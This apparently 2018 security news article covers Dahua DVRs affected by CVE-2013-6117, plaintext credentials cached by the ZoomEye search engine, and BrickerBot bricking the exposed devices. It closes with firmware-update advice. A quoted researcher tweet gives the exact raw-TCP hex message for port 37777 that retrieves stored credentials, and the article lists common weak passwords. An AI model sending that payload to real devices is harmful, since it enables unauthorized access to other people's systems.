When it comes to the internet of extremely insecure things, it\u2019s not a good sign when a security researcher warns that \u201ca new low has been achieved in the ease of hacking IoT devices.\u201dThat ease of hacking to which Ankit Anubhav, principal researcher at NewSky Security, was referring is due to the IoT search engine ZoomEye caching the login passwords for tens of thousands of devices; more specifically, thousands of Dahua DVRs.The actual vulnerability in Dahua DVRs, CVE-2013-6117, was discovered way back in 2013 by Depth Security researcher Jake Reynolds. Google\/IDGAs you can see by the suggested search results, plenty of people are aware of the 5-year-old flaw. Yet that doesn\u2019t imply that people with Dahua DVRs updated the vulnerable firmware versions 2.608.0000.0 or 2.608.GV00.0 after a patch was made available.What Anubhav discovered was that attackers need not connect to the vulnerable Dahua DVRs to obtain the credentials, since ZoomEye has scanned and stored those credentials for anyone to find.So CVE-2013-6117 = just connect to port 37777 to get the creds which is stored in plaintext. But the attackers do not even need to write code to connect to the port as they can login to public scanner like ZoomEye which store the output of requests in their website and dump it. pic.twitter.com\/M2MyYJ16D9\u2014 Ankit Anubhav (@ankit_anubhav) July 12, 2018BrickerBot is bricking vulnerable Dahua DVRsIn fact, Anubhav noted that the BrickerBot author has used the IoT search engine site to find and brick vulnerable Dahua DVRs. The BrickerBot botnet, as you likely recall, would brick unsecured IoT devices before they could be added to Mirai or other IoT botnets. The BrickerBot author, \u201cJanitor,\u201d claimed that even though the vulnerability was five years old, ZoomEye\u2019s cache of credentials applied to 30,000 vulnerable Dahua DVR devices.The sheer amount of devices having their credentials stored in a scanning site is just amazing. And this is already abused by BrickerBot author, as he mentioned in his messages to the public that 30,000 devices have this issue.\u2014 Ankit Anubhav (@ankit_anubhav) July 12, 2018Anubhav added:Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds "xa3x00x00x00x00x00x00x00x63x6fx6ex66x69x67x00x00x8cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" https:\/\/t.co\/Z6I4uVp9sK\u2014 Ankit Anubhav (@ankit_anubhav) July 13, 2018Furthermore, as is commonly the case, thousands upon thousands of devices are \u201csecured\u201d with shoddy passwords.And of course, people here too have not failed to put extremely generic passwords.https:\/\/t.co\/usZ46tftMT 270 devices have password as "admin123" lol.Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN \u2014 Ankit Anubhav (@ankit_anubhav) July 12, 2018With just three search attempts on ZoomEye, Bleeping Computer\u2019s Catalin Cimpanu found about 30,000 vulnerable Dahua devices: roughly \u201c15,800 Dahua devices with a password of \u2018admin\u2019, over 14,000 with a password of \u2018123456,\u2019 and over 600 with a password of \u2018password\u2019.\u201dAnubhav tweeted:Wow and how did I miss this. 13900+ of these devices have their password as "123456" Check here https:\/\/t.co\/1fSJX4KcWG#iot #security #fail This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https:\/\/t.co\/OAzmy7GnY8\u2014 Ankit Anubhav (@ankit_anubhav) July 13, 2018Although Anubhav had not heard back from the owner of ZoomEye after requesting for the results to be scrubbed, Bleeping Computer was told by the owner that \u201c\u2019blocking data in ZoomEye doesn't solve the problem\u2019 and that he doesn\u2019t plan on removing this data.\u201dDahua DVR users should update their firmwareIf you have a Dahua device and don\u2019t have a clue what firmware it is running, Dahua Technology advised finding the model number on your device and entering it in the firmware search tool or using the DVR firmware toolkit which can be downloaded from the same page.Otherwise, as Anubhav pointed out, you might as well say bye-bye to devices running ancient vulnerable firmware when there are sites such as ZoomEye caching credentials and making hacking IoT devices even easier.